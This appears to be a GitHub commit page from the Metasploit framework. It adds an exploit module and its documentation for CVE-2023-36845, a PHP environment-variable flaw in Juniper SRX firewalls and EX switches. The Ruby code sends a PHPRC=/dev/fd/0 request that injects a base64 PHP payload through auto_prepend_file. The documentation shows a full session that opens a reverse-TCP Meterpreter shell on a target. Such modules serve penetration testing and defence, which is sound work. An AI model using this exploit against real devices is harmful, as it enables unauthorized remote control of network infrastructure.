Junos OS SRX and EX PHPRC Manipulation RCE

rapid7 · Sep 20, 2023 · da8c020 · da8c020
1 parent 1ef030d
commit da8c020
Show file tree

Hide file tree

Showing 2 changed files with 222 additions and 0 deletions.
diff --git a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+and EX switches.
+
+Juniper Networks Junos OS affected SRX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S5.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S2.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+Juniper Networks Junos OS affected EX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S4.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S1.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+### Description
+
+The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+by opening `/dev/fd/0`. The exploit also makes use of two useful PHP features. The first being
+`auto_prepend_file` which causes the provided file to be added using the `require` function. The second PHP
+function is `allow_url_include` which allows the use of URL-aware `fopen` wrappers. By enabling
+`allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
+`data://` to provide a file inline which includes the base64 encoded PHP payload.
+
+### Setup
+
+1. Navigate to the following URL: https://www.juniper.net/us/en/dm/download-next-gen-vsrx-firewall-trial.html
+1. Setup an account and download the free trail of: `junos-vsrx3-x86-64-20.2R1.10.scsi.ova`
+1. Boot
+1. Log in as `root` / no password
+1. Run `cli`
+1. Run `configure`
+1. Set password: `set system root-authentication plain-text-password`
+1. Set hostname: `set system host-name (host-name)`
+1. Set up the management interface: `set interfaces fxp0 unit 0 family inet dhcp-client`
+1. Set up the traffic interfaces: `set interfaces ge-0/0/0 unit 0 family inet dhcp-client`
+1. Set up security zones: `set security zones security-zone trust interfaces ge-0/0/0.0`
+1. Validate the config: `commit check`
+   - If you typo'd something, you can `rollback` here and try again
+1. Commit: `commit`
+1. Exit config, then exit CLI: `exit` then `exit`
+1. Reboot: `reboot`
+1. Log in with your new account
+1. Run `cli` again
+1.Get the ip address with `show interfaces terse | match fxp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use freebsd/http/junos_phprc_auto_prepend_file`
+1. Set the `RHOST`, `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `nobody` user.
+
+## Scenarios
+
+### PHP Meterpreter junos-vsrx3-x86-64-20.2R1.10.scsi.ova
+
+```
+msf6> use freebsd/http/junos_phprc_auto_prepend_file
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
+
+Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.0.247    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.0.77     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Junos OS SRX Firewall / EX Switch
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247
+rhosts => 192.168.0.247
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77
+lhost => 192.168.0.77
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
+
+[*] Started reverse TCP handler on 192.168.0.77:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
+[*] Sending stage (39927 bytes) to 192.168.0.247
+[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400
+
+meterpreter > getuid
+Server username: nobody
+meterpreter > sysinfoi
+[-] Unknown command: sysinfoi
+meterpreter > sysinfo
+Computer    : JUNOS
+OS          : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     [email protected]:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
+Meterpreter : php/freebsd
+meterpreter >
+```
diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE',
+        'Description' => %q{
+          This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being
+          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP
+          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling
+          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses
+          data:// to provide a file inline which includes the base64 encoded PHP payload.
+        },
+        'Author' => [
+          'Jacob Baines', # Analysis
+          'jheysel-r7',   # Msf module
+          'Ron Bowes'     # Target setup instructions
+        ],
+        'References' => [
+          [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
+          [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
+          [ 'CVE', '2023-36845']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Junos OS SRX Firewall / EX Switch', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-08-17',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded'
+    )
+
+    return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
+
+    CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    post_data = "allow_url_include=1\n"
+    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => 'application/x-www-form-urlencoded'
+    )
+
+    print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+end